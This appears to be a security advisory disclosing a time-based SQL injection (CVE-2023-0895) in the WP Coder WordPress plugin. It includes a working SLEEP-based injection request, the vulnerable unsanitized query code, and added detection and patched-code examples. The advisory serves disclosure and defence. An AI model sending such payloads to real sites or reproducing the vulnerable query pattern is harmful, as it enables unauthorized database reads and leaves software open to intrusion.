WP Coder, Version 2.5.3 Advisory


The following document describes identified vulnerabilities in the WP CODER application, version 2.5.3.

Product Vendor

Wow Company

Product Description

WP Coder is a WordPress plugin for adding custom HTML, CSS and JS code to a site. The project’s official website is https://wordpress.org/plugins/... The latest version of the application is 2.5.4, released on January 10, 2023.

Vulnerabilities List

One vulnerability was identified within the WP Coder plugin:

  • SQL injection (SQLi)

This vulnerability is described in the following sections.

Affected Version

All versions prior to and including 2.5.3

Summary of Findings

The WP Coder plugin is affected by a time-based SQL injection vulnerability via the ‘id’ parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.

Impact

The WP Coder plugin is affected by a time-based SQL injection vulnerability that allows an authenticated attacker to gain unauthorized read access to the WordPress database. This makes it possible for authenticated attackers with administrative privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Solution

Update to version 2.5.4

Vulnerabilities

SQL injection

The WP Coder plugin is vulnerable to time-based SQL injection via the ‘id’ parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. An authenticated attacker with administrative privileges could leverage this vulnerability to append additional SQL queries to already existing queries, which can be used to extract sensitive information from the database.

Vulnerability Details

CVE ID: CVE-2023-0895

Vulnerability Type: SQL Injection

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-89

The WP Coder plugin is affected by a time-based SQL injection vulnerability that allows an authenticated attacker to gain unauthorized read access to the WordPress database.

To exploit the vulnerability, send the following request to the WP Coder plugin API and observe the timing of the response:

Request

GET /wp-admin/admin.php?page=wp-coder&tab=add_new&act=duplicate&id=1+AND+(SELECT+3797+FROM+(SELECT(SLEEP(10)))SITY) HTTP/1.1
Host: vulnerable-host
…omitted for brevity…
Cookie: …omitted for brevity…

Response

HTTP/1.1 200 OK
Date: Sun, 04 Dec 2022 06:39:10 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
…omitted for brevity…

The above response was received after approximately ten seconds, thus confirming the vulnerability. Additionally, increasing the time delay causes response times to increase, as shown below:


FIGURE 1 - SQL injection payloads executing with progressively longer sleep timings

As the figure shows, with every increase in the time delay, the server responded only after the delay set in the SLEEP function had elapsed.
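From the defender's side, the same property that confirms the bug (a non-numeric ‘id’ carrying SQL keywords such as SLEEP) is easy to spot in web server access logs. The following PHP CLI script is an added example, not part of this advisory or of the WP Coder plugin: it parses combined-format access-log lines, isolates requests to the WP Coder admin page, and flags any ‘id’ value that is not a bare integer. The log lines and the function name wpcoder_example_flag_request are constructed for this example.

```php
<?php
// Added example (not the advisory's or the plugin's code): flag WP Coder
// admin requests whose "id" parameter is anything other than a plain integer.

function wpcoder_example_flag_request( string $log_line ): ?array {
    // Pull the request target out of a combined-format line: "GET /path HTTP/1.1"
    if ( ! preg_match( '/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $log_line, $m ) ) {
        return null;
    }
    $query = parse_url( $m[1], PHP_URL_QUERY );
    if ( ! $query ) {
        return null;
    }
    parse_str( $query, $params ); // URL-decodes values ("+" and %xx become plain text)

    // Only the WP Coder admin page with an "id" parameter is of interest here.
    if ( ( $params['page'] ?? '' ) !== 'wp-coder' || ! isset( $params['id'] ) ) {
        return null;
    }
    $id = (string) $params['id'];

    // A legitimate edit/duplicate request carries a bare row id. Anything else
    // (spaces, quotes, keywords, parentheses) deserves an alert; time-based
    // payloads in particular contain SLEEP( or BENCHMARK(.
    if ( ctype_digit( $id ) ) {
        return null;
    }
    $reason = preg_match( '/\b(SLEEP|BENCHMARK)\s*\(/i', $id )
        ? 'time-based SQLi pattern in id'
        : 'non-numeric id';

    return array( 'id' => $id, 'reason' => $reason );
}

// Constructed sample log lines: one benign request, the advisory's own
// time-based payload, a generic quote-based probe, and an unrelated page.
$sample_lines = array(
    '203.0.113.5 - - [04/Dec/2022:06:39:00 +0000] "GET /wp-admin/admin.php?page=wp-coder&tab=add_new&act=duplicate&id=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Dec/2022:06:39:10 +0000] "GET /wp-admin/admin.php?page=wp-coder&tab=add_new&act=duplicate&id=1+AND+(SELECT+3797+FROM+(SELECT(SLEEP(10)))SITY) HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Dec/2022:06:40:00 +0000] "GET /wp-admin/admin.php?page=wp-coder&tab=add_new&act=duplicate&id=1%27%20OR%201%3D1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Dec/2022:06:41:00 +0000] "GET /wp-admin/admin.php?page=other&id=1+AND+SLEEP(5) HTTP/1.1" 200 100',
);

foreach ( $sample_lines as $n => $line ) {
    $hit = wpcoder_example_flag_request( $line );
    if ( null === $hit ) {
        echo "line {$n}: ok\n";
    } else {
        echo "line {$n}: ALERT ({$hit['reason']}): id=\"{$hit['id']}\"\n";
    }
}
```

Run it with `php detect.php`. Only line 1 (the SLEEP payload) and line 2 (the quote-based probe) are reported; line 0 is a normal integer id and line 3 is not a WP Coder request. Because the check is on the shape of the parameter rather than a keyword blocklist, it also catches obfuscated variants that a SLEEP-only signature would miss.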

The plugin reads the following unsanitized variable in \partials\include-data.php:28 and interpolates it directly into a query string, so attacker-controlled SQL is executed by the get_row function:

…omitted for brevity…
} else if ( $act === "duplicate" ) {
	// Source: the "id" request parameter is used as-is, with no validation or escaping.
	$recid  = $_REQUEST["id"];
	// Sink: $recid is concatenated into the SQL string instead of being passed
	// through $wpdb->prepare(), so its contents become part of the query.
	$result = $wpdb->get_row( "SELECT * FROM $data WHERE id=$recid" );
	if ( $result ) {
		$id    = "";
		$title = "";
		$param = unserialize( $result->param );
		$last  = $wpdb->get_col( "SELECT id FROM $data" );;
		$tool_id = max( $last ) + 1;
		$hidval  = 1;
		$btn     = __( 'Save', 'wpcoder' );
}
…omitted for brevity…

FIGURE 2 - Unsanitized $recid variable
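The fix for this class of bug is to stop treating ‘id’ as SQL text at all. The function below is an added example, not the plugin's own code or its 2.5.4 patch: it rewrites the “duplicate” branch from Figure 2 so that the parameter is coerced to an integer and bound through $wpdb->prepare(). It assumes the WordPress global $wpdb and the plugin's table name in $data exist as in the original snippet; the function name wpcoder_example_duplicate_row is hypothetical.

```php
<?php
/**
 * Added example (not WP Coder's code): hardened replacement for the
 * "duplicate" branch shown in Figure 2. Assumes the WordPress global $wpdb
 * and a trusted table name in $data, as in the original snippet.
 *
 * @param string $data Table name built by trusted plugin code (never from the request).
 * @return array|null  Prefilled form values for the duplicated row, or null.
 */
function wpcoder_example_duplicate_row( $data ) {
    global $wpdb;

    // 1. Coerce the request parameter to a non-negative integer before it gets
    //    anywhere near SQL. absint() yields 0 for anything that is not a number,
    //    so a value such as "1 AND (SELECT ...)" collapses to 1 and "abc" to 0.
    $recid = isset( $_REQUEST['id'] ) ? absint( wp_unslash( $_REQUEST['id'] ) ) : 0;
    if ( 0 === $recid ) {
        return null; // nothing to duplicate; also avoids a pointless query
    }

    // 2. Bind the value with $wpdb->prepare(). The %d placeholder forces an
    //    integer, so even a value that bypassed step 1 cannot alter the query
    //    structure. The table name cannot be a placeholder here (prepare()
    //    gained %i for identifiers only in WordPress 6.2), which is why $data
    //    must come from trusted plugin code and never from user input.
    $row = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$data} WHERE id = %d", $recid )
    );
    if ( ! $row ) {
        return null;
    }

    // 3. Same follow-up logic as the original, but the next id is computed in
    //    SQL rather than by pulling every id into PHP and calling max().
    $last    = (int) $wpdb->get_var( "SELECT MAX(id) FROM {$data}" );
    $tool_id = $last + 1;

    return array(
        'id'      => '',
        'title'   => '',
        // maybe_unserialize() is WordPress's tolerant wrapper around unserialize().
        'param'   => maybe_unserialize( $row->param ),
        'tool_id' => $tool_id,
        'hidval'  => 1,
        'btn'     => __( 'Save', 'wpcoder' ),
    );
}
```

Two layers are deliberate: absint() makes the intent (a row id is an integer) explicit at the point of input, and prepare() guarantees that whatever reaches the query is typed correctly even if a later refactor removes the first check. The same pattern applies to every other branch in include-data.php that builds SQL from $_REQUEST.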

Credits

Timeline

  • 12/03/2022: Initial discovery
  • 01/09/2023: Contact with vendor
  • 01/10/2023: Vendor acknowledged vulnerability
  • 01/10/2023: Vendor released patched version 2.5.4
  • 02/17/2023: Vulnerability publicly disclosed


About the author, Etan Castro Aldrete

Consultant II

Etan Castro Aldrete is a Mexico-based Consultant II at Bishop Fox. Before joining Bishop Fox, Etan worked on different types of hybrid web applications as a backend developer. Etan is credited with public disclosure of CVE-2022-3402, a stored cross-site scripting vulnerability within Log HTTP Requests, a WordPress plugin. He currently holds five security certifications including Offensive Security Web Expert (OSWE), Offensive Security Certified Professional (OSCP), CompTIA Network Vulnerability Assessment Professional - CNVP Stackable Certification, CompTIA PenTest+ ce Certification, and CompTIA Security+ ce Certification. When he is not looking for vulnerabilities, he is searching for ancient coins with a metal detector.
